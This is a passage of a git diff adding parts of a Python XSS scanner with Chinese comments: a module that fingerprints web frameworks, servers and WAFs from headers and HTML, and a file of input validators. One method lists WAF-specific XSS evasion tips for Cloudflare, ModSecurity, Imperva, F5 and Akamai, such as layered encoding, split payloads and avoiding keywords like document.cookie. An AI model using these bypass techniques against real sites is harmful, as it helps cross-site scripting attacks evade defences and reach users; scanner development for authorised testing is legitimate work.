+                ('Set-Cookie', re.compile(r'incap_ses', re.I))
+            ],
+            'Akamai': [
+                ('X-Akamai-Transformed', re.compile(r'.*')),
+                ('Set-Cookie', re.compile(r'ak_bmsc', re.I))
+            ],
+            'F5 BIG-IP': [
+                ('Set-Cookie', re.compile(r'BIGipServer', re.I)),
+                ('Server', re.compile(r'BigIP', re.I))
+            ],
+            'Barracuda': [
+                ('Set-Cookie', re.compile(r'barra_counter_session', re.I))
+            ]
+        }
+        
+    def detect(self, response, content=None):
+        """
+        检测网页使用的技术
+        
+        Args:
+            response: HTTP响应对象
+            content: HTML内容(可选)
+            
+        Returns:
+            dict: 检测到的技术信息
+        """
+        if not response:
+            return {}
+            
+        results = {
+            'frontend': [],
+            'backend': [],
+            'server': [],
+            'waf': []
+        }
+        
+        # 提取HTML内容
+        html_content = content or response.text
+        
+        # 解析HTML
+        try:
+            soup = BeautifulSoup(html_content, 'html.parser')
+        except Exception as e:
+            logger.error(f"解析HTML时发生错误: {str(e)}")
+            soup = None
+        
+        # 检测前端框架
+        if soup:
+            for framework, patterns in self.frontend_frameworks.items():
+                for tag_name, attrs in patterns:
+                    elements = soup.find_all(tag_name, attrs)
+                    if elements:
+                        if framework not in results['frontend']:
+                            results['frontend'].append(framework)
+                            break
+        
+        # 检测后端技术
+        headers = response.headers
+        
+        # 基于HTTP头的检测
+        for tech, patterns in self.backend_technologies.items():
+            for header_name, pattern in patterns:
+                if header_name in headers:
+                    if isinstance(pattern, re.Pattern) and pattern.search(headers[header_name]):
+                        if tech not in results['backend']:
+                            results['backend'].append(tech)
+                            break
+        
+        # 基于HTML的后端技术检测
+        if soup:
+            for tech, patterns in self.backend_technologies.items():
+                if tech in results['backend']:
+                    continue
+                    
+                for tag_name, attrs in patterns:
+                    if tag_name in ['link', 'a', 'form', 'input', 'meta', 'script', 'body']:
+                        elements = soup.find_all(tag_name, attrs)
+                        if elements:
+                            if tech not in results['backend']:
+                                results['backend'].append(tech)
+                                break
+        
+        # 检测服务器技术
+        for server, patterns in self.server_technologies.items():
+            for header_name, pattern in patterns:
+                if header_name in headers:
+                    if isinstance(pattern, re.Pattern) and pattern.search(headers[header_name]):
+                        if server not in results['server']:
+                            results['server'].append(server)
+                            break
+        
+        # 检测WAF
+        for waf, patterns in self.waf_technologies.items():
+            for header_name, pattern in patterns:
+                if header_name in headers:
+                    if isinstance(pattern, re.Pattern) and pattern.search(headers[header_name]):
+                        if waf not in results['waf']:
+                            results['waf'].append(waf)
+                            break
+                            
+        # 添加详细检测信息
+        self._enhance_detection(results, soup, headers)
+        
+        return results
+    
+    def _enhance_detection(self, results, soup, headers):
+        """
+        增强检测，添加更多详细信息
+        
+        Args:
+            results: 已检测的结果
+            soup: BeautifulSoup对象
+            headers: HTTP响应头
+        """
+        # 检测JavaScript库的版本
+        if soup:
+            # 检测React版本
+            if 'React' in results['frontend']:
+                script_tags = soup.find_all('script')
+                for script in script_tags:
+                    if script.string and 'React.version' in script.string:
+                        version_match = re.search(r'React.version\s*=\s*[\'"]([^\'"]+)[\'"]', script.string)
+                        if version_match:
+                            results['frontend'].remove('React')
+                            results['frontend'].append(f"React {version_match.group(1)}")
+                            break
+            
+            # 检测Angular版本
+            if 'Angular' in results['frontend']:
+                for script in soup.find_all('script'):
+                    if script.string and 'angular.version' in script.string:
+                        version_match = re.search(r'angular.version\s*=\s*\{[^\}]*full:\s*[\'"]([^\'"]+)[\'"]', script.string)
+                        if version_match:
+                            results['frontend'].remove('Angular')
+                            results['frontend'].append(f"Angular {version_match.group(1)}")
+                            break
+            
+            # WordPress版本
+            if 'WordPress' in results['backend']:
+                meta_tags = soup.find_all('meta', {'name': 'generator'})
+                for meta in meta_tags:
+                    content = meta.get('content', '')
+                    if 'WordPress' in content:
+                        version_match = re.search(r'WordPress\s*([0-9\.]+)', content)
+                        if version_match:
+                            results['backend'].remove('WordPress')
+                            results['backend'].append(f"WordPress {version_match.group(1)}")
+                            break
+        
+        # 检测服务器版本
+        if 'Server' in headers:
+            server_header = headers['Server']
+            
+            # Nginx版本
+            if 'Nginx' in results['server']:
+                version_match = re.search(r'nginx/([0-9\.]+)', server_header, re.I)
+                if version_match:
+                    results['server'].remove('Nginx')
+                    results['server'].append(f"Nginx {version_match.group(1)}")
+            
+            # Apache版本
+            elif 'Apache' in results['server']:
+                version_match = re.search(r'Apache/([0-9\.]+)', server_header, re.I)
+                if version_match:
+                    results['server'].remove('Apache')
+                    results['server'].append(f"Apache {version_match.group(1)}")
+    
+    def get_waf_bypass_techniques(self, detected_waf):
+        """
+        根据检测到的WAF，返回可能的绕过技术
+        
+        Args:
+            detected_waf: 检测到的WAF列表
+            
+        Returns:
+            dict: WAF绕过技术
+        """
+        bypass_techniques = {}
+        
+        for waf in detected_waf:
+            if waf == 'Cloudflare':
+                bypass_techniques['Cloudflare'] = [
+                    '使用不同的编码方式: HTML, URL, Unicode, Base64等',
+                    '利用换行符分割XSS Payload',
+                    '使用JavaScript事件处理程序的大小写混合形式',
+                    '使用不同的HTML标签（避免常见的如script, img, iframe）',
+                    '尝试使用较少被检测的事件如onmouseover, onerror, onwheel等'
+                ]
+            elif waf == 'ModSecurity':
+                bypass_techniques['ModSecurity'] = [
+                    '使用JavaScript事件处理程序的不同形式',
+                    '使用HTML实体编码',
+                    '分割Payload: < s c r i p t >',
+                    '使用JavaScript的eval函数和字符串操作函数',
+                    '使用CSS注入配合XSS'
+                ]
+            elif waf == 'Imperva':
+                bypass_techniques['Imperva'] = [
+                    '使用JavaScript原型链污染技术',
+                    '避免使用关键词(alert, document.cookie等)',
+                    '使用JavaScript的间接调用方法',
+                    '使用多层编码: URL编码 + HTML编码 + Unicode编码',
+                    '利用长字符串和重复字符迷惑WAF规则'
+                ]
+            elif waf == 'F5 BIG-IP':
+                bypass_techniques['F5 BIG-IP'] = [
+                    '使用非标准事件处理程序',
+                    'DOM XSS手法通常更能绕过F5的防护',
+                    '使用JavaScript模板字符串',
+                    '使用JavaScript的Function构造函数',
+                    '利用特定浏览器的解析差异'
+                ]
+            elif waf == 'Akamai':
+                bypass_techniques['Akamai'] = [
+                    '利用JavaScript的变量和函数名混淆',
+                    '使用CDATA和注释规避特征检测',
+                    '避免直接使用javascript:伪协议',
+                    '使用data:text/html;base64,...编码',
+                    '利用JavaScript中的字符串拼接和动态执行'
+                ]
+        
+        return bypass_techniques 
\ No newline at end of file
diff --git a/xss_scanner/utils/validator.py b/xss_scanner/utils/validator.py
new file mode 100644
index 0000000..24b9071
--- /dev/null
+++ b/xss_scanner/utils/validator.py
@@ -0,0 +1,228 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+参数验证模块，负责验证用户输入的参数
+"""
+
+import re
+import os
+import logging
+from urllib.parse import urlparse
+
+logger = logging.getLogger('xss_scanner')
+
+def validate_target(target):
+    """
+    验证目标URL是否有效
+    
+    Args:
+        target: 目标URL
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not target:
+        return False
+        
+    # 检查URL格式
+    if not target.startswith(('http://', 'https://')):
+        logger.warning(f"无效的URL格式: {target}，URL必须以http://或https://开头")
+        return False
+        
+    # 解析URL
+    try:
+        parsed_url = urlparse(target)
+        if not parsed_url.netloc:
+            logger.warning(f"无效的URL: {target}，缺少域名")
+            return False
+    except Exception as e:
+        logger.warning(f"URL解析失败: {target} - {str(e)}")
+        return False
+        
+    return True
+
+def validate_file_path(file_path, check_exists=True, check_write=False):
+    """
+    验证文件路径是否有效
+    
+    Args:
+        file_path: 文件路径
+        check_exists: 是否检查文件是否存在
+        check_write: 是否检查文件是否可写
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not file_path:
+        return False
+        
+    # 检查文件是否存在
+    if check_exists and not os.path.exists(file_path):
+        logger.warning(f"文件不存在: {file_path}")
+        return False
+        
+    # 检查文件是否可写
+    if check_write:
+        try:
+            # 检查文件是否可写
+            if os.path.exists(file_path):
+                if not os.access(file_path, os.W_OK):
+                    logger.warning(f"文件不可写: {file_path}")
+                    return False
+            else:
+                # 检查目录是否可写
+                dir_path = os.path.dirname(file_path)
+                if dir_path and not os.access(dir_path, os.W_OK):
+                    logger.warning(f"目录不可写: {dir_path}")
+                    return False
+        except Exception as e:
+            logger.warning(f"检查文件权限失败: {file_path} - {str(e)}")
+            return False
+            
+    return True
+
+def validate_ip(ip):
+    """
+    验证IP地址是否有效
+    
+    Args:
+        ip: IP地址
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not ip:
+        return False
+        
+    # IPv4正则表达式
+    ipv4_pattern = r'^(\d{1,3}\.){3}\d{1,3}$'
+    
+    # 检查格式
+    if not re.match(ipv4_pattern, ip):
+        return False
+        
+    # 检查每个段的范围
+    segments = ip.split('.')
+    for segment in segments:
+        if not 0 <= int(segment) <= 255:
+            return False
+            
+    return True
+
+def validate_port(port):
+    """
+    验证端口号是否有效
+    
+    Args:
+        port: 端口号
+        
+    Returns:
+        bool: 是否有效
+    """
+    try:
+        port = int(port)
+        return 1 <= port <= 65535
+    except:
+        return False
+
+def validate_proxy(proxy):
+    """
+    验证代理设置是否有效
+    
+    Args:
+        proxy: 代理设置
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not proxy:
+        return False
+        
+    # 检查代理格式
+    if not proxy.startswith(('http://', 'https://', 'socks4://', 'socks5://')):
+        logger.warning(f"无效的代理格式: {proxy}，代理必须以http://、https://、socks4://或socks5://开头")
+        return False
+        
+    # 解析代理
+    try:
+        parsed_proxy = urlparse(proxy)
+        if not parsed_proxy.netloc:
+            logger.warning(f"无效的代理: {proxy}，缺少主机名")
+            return False
+    except Exception as e:
+        logger.warning(f"代理解析失败: {proxy} - {str(e)}")
+        return False
+        
+    return True
+
+def validate_regex(pattern):
+    """
+    验证正则表达式是否有效
+    
+    Args:
+        pattern: 正则表达式
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not pattern:
+        return False
+        
+    try:
+        re.compile(pattern)
+        return True
+    except re.error:
+        return False
+
+def validate_headers(headers):
+    """
+    验证HTTP头是否有效
+    
+    Args:
+        headers: HTTP头，格式：Header1:Value1;Header2:Value2
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not headers:
+        return False
+        
+    try:
+        # 分割HTTP头
+        header_pairs = headers.split(';')
+        for header in header_pairs:
+            if header.strip() and ':' not in header:
+                logger.warning(f"无效的HTTP头格式: {header}，应为Header:Value格式")
+                return False
+                
+        return True
+    except Exception as e:
+        logger.warning(f"验证HTTP头失败: {str(e)}")
+        return False
+
+def validate_cookies(cookies):
+    """
+    验证Cookie是否有效
+    
+    Args:
+        cookies: Cookie，格式：name1=value1; name2=value2
+        
+    Returns:
+        bool: 是否有效
+    """
+    if not cookies:
+        return False
+        
+    try:
+        # 分割Cookie
+        cookie_pairs = cookies.split(';')
+        for cookie in cookie_pairs:
+            if cookie.strip() and '=' not in cookie:
+                logger.warning(f"无效的Cookie格式: {cookie}，应为name=value格式")
+                return False
+                
+        return True
+    except Exception as e:
+        logger.warning(f"验证Cookie失败: {str(e)}")
+        return False 
\ No newline at end of file